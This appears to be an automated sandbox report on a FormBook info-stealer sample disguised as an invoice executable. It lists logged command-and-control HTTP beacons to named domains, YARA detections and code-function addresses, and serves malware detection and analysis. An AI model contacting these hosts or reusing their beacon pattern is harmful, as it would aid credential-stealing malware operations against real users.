Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=/jsG/ERKVryn6C207o/LcEim1QqN5MyxJsKeesIBefptic1Rr4NlAfFwHDf6m9wpfQov&3fIl1=6lYt5jhP HTTP/1.1Host: www.littlefishth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1Host: www.dif-directory.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.avto-click.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=ugV9/Bgr3P1mb2nQP4ZDF3X4f1GtZOS3PBkli+plGM3Op0j+GZlR0Q/pb3EXjxNGdMZ9&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.mariforum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR HTTP/1.1Host: www.effective.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=xrAotTyffsBJpcnKB2kZyNWsSnGPjBByJzEFrz2pnPZy718OzpkHnAopnraeQfQtdHy1 HTTP/1.1Host: www.fatima2021.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=p9I58q6arTbdr9cKXlwfdhVh2EEOLbkp3e4XnVrXYsEKFiBKUQDH2p9qO5FVTmLJCNVs HTTP/1.1Host: www.dubaicars.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&3fkxqn=hXcDbfFHWB34bR8p HTTP/1.1Host: www.inklusion.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=B50h1ADlVgBVReAtZzXZoMMEQCBylsFCBP4nBu/XE2swHcOtDXvVzvqty7hRo1ZxzC15&3fkxqn=hXcDbfFHWB34bR8p HTTP/1.1Host: www.heyvecino.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=x7rWj66roGKEZAObj73O6eF88ujFBI8nvGjdodwL/UKuZeUM1FVQm65GonJ0KgAiqF14 HTTP/1.1Host: www.gdav130.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=UGKaYhNfstwp7hLG7UrFh27uWUnvgBcRCHkNbEmp8q6nPSt6bmPZIRKUPgjia3mN02Vr&3fkxqn=hXcDbfFHWB34bR8p HTTP/1.1Host: www.apps365.oneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1Host: www.dif-directory.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.avto-click.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4 HTTP/1.1Host: www.lopsrental.leaseConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

HTTPS traffic detected: 162.241.120.147:443 -> 192.168.11.20:49790 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0000000B.00000002.11094891807.0000000004057000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com

Source: draft_inv dec21.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 0000000B.00000002.11094891807.0000000004057000.00000004.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE

Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_02432CD7	1_2_02432CD7
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_0242CB27	1_2_0242CB27
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_0242D058	1_2_0242D058
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_02430A65	1_2_02430A65
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_02431671	1_2_02431671
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_0242A671	1_2_0242A671
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_024302FD	1_2_024302FD
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_0242FCFD	1_2_0242FCFD
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 1_2_0243069C	1_2_0243069C
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E970EAD	8_2_1E970EAD
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C1EB2	8_2_1E8C1EB2
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E979ED2	8_2_1E979ED2
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B2EE8	8_2_1E8B2EE8
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E902E48	8_2_1E902E48
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8E0E50	8_2_1E8E0E50
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E960E6D	8_2_1E960E6D
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E97EFBF	8_2_1E97EFBF
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E971FC6	8_2_1E971FC6
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C6FE0	8_2_1E8C6FE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8CCF00	8_2_1E8CCF00
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E97FF63	8_2_1E97FF63
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E959C98	8_2_1E959C98
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8D8CDF	8_2_1E8D8CDF
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DFCE0	8_2_1E8DFCE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E98ACEB	8_2_1E98ACEB
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E947CE8	8_2_1E947CE8
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B0C12	8_2_1E8B0C12
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8CAC20	8_2_1E8CAC20
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E96EC4C	8_2_1E96EC4C
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3C60	8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E97EC60	8_2_1E97EC60
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E976C69	8_2_1E976C69
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8D2DB0	8_2_1E8D2DB0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C9DD0	8_2_1E8C9DD0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E95FDF4	8_2_1E95FDF4
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8BAD00	8_2_1E8BAD00
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E97FD27	8_2_1E97FD27
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E977D4C	8_2_1E977D4C
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C0D69	8_2_1E8C0D69
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E97FA89	8_2_1E97FA89
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DFAA0	8_2_1E8DFAA0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E97CA13	8_2_1E97CA13
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E97EA5B	8_2_1E97EA5B
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E934BC0	8_2_1E934BC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8FDB19	8_2_1E8FDB19
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C0B10	8_2_1E8C0B10
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E97FB2E	8_2_1E97FB2E
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8D6882	8_2_1E8D6882
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E9398B2	8_2_1E9398B2
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C28C0	8_2_1E8C28C0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E9718DA	8_2_1E9718DA
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E9778F3	8_2_1E9778F3
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C3800	8_2_1E8C3800
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8EE810	8_2_1E8EE810
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E960835	8_2_1E960835
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8A6868	8_2_1E8A6868
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E935870	8_2_1E935870
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E97F872	8_2_1E97F872
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C9870	8_2_1E8C9870
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DB870	8_2_1E8DB870
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8BE9A0	8_2_1E8BE9A0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E97E9A6	8_2_1E97E9A6
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E9059C0	8_2_1E9059C0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8899E8	8_2_1E8899E8
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C0680	8_2_1E8C0680
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E97A6C0	8_2_1E97A6C0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E97F6F6	8_2_1E97F6F6
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8BC6E0	8_2_1E8BC6E0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E9336EC	8_2_1E9336EC
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DC600	8_2_1E8DC600
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E95D62C	8_2_1E95D62C
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E96D646	8_2_1E96D646
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8E4670	8_2_1E8E4670
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E976757	8_2_1E976757
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C2760	8_2_1E8C2760
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8CA760	8_2_1E8CA760
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E92D480	8_2_1E92D480
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C0445	8_2_1E8C0445
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E9775C6	8_2_1E9775C6
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E97F5C9	8_2_1E97F5C9
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E98A526	8_2_1E98A526
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8AD2EC	8_2_1E8AD2EC
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E882245	8_2_1E882245
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E97124C	8_2_1E97124C
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B1380	8_2_1E8B1380
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8CE310	8_2_1E8CE310
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E97F330	8_2_1E97F330
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8F508C	8_2_1E8F508C
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8B00A0	8_2_1E8B00A0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8CB0D0	8_2_1E8CB0D0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E9770F1	8_2_1E9770F1
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E96E076	8_2_1E96E076
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8C51C0	8_2_1E8C51C0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8DB1E0	8_2_1E8DB1E0
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E98010E	8_2_1E98010E
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E8AF113	8_2_1E8AF113
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E95D130	8_2_1E95D130
Source: C:\Users\user\Desktop\draft_inv dec21.exe	Code function: 8_2_1E90717A	8_2_1E90717A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B31380	11_2_03B31380
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BFF330	11_2_03BFF330
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B4E310	11_2_03B4E310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B2D2EC	11_2_03B2D2EC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BF124C	11_2_03BF124C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B02245	11_2_03B02245
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B5B1E0	11_2_03B5B1E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B451C0	11_2_03B451C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BDD130	11_2_03BDD130
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B2F113	11_2_03B2F113
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B8717A	11_2_03B8717A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03C0010E	11_2_03C0010E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B300A0	11_2_03B300A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B7508C	11_2_03B7508C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BF70F1	11_2_03BF70F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B4B0D0	11_2_03B4B0D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BEE076	11_2_03BEE076
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B42760	11_2_03B42760
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B4A760	11_2_03B4A760
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BF6757	11_2_03BF6757
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B40680	11_2_03B40680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BFF6F6	11_2_03BFF6F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B3C6E0	11_2_03B3C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BB36EC	11_2_03BB36EC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BFA6C0	11_2_03BFA6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BDD62C	11_2_03BDD62C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B5C600	11_2_03B5C600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B64670	11_2_03B64670
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BED646	11_2_03BED646
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BFF5C9	11_2_03BFF5C9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BF75C6	11_2_03BF75C6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03C0A526	11_2_03C0A526
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BAD480	11_2_03BAD480
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B40445	11_2_03B40445
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BB4BC0	11_2_03BB4BC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BFFB2E	11_2_03BFFB2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B40B10	11_2_03B40B10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B7DB19	11_2_03B7DB19
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B5FAA0	11_2_03B5FAA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BFFA89	11_2_03BFFA89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BFCA13	11_2_03BFCA13
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BFEA5B	11_2_03BFEA5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B3E9A0	11_2_03B3E9A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BFE9A6	11_2_03BFE9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B099E8	11_2_03B099E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B859C0	11_2_03B859C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BB98B2	11_2_03BB98B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B56882	11_2_03B56882
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BF78F3	11_2_03BF78F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BF18DA	11_2_03BF18DA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B428C0	11_2_03B428C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03BE0835	11_2_03BE0835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_03B6E810	11_2_03B6E810
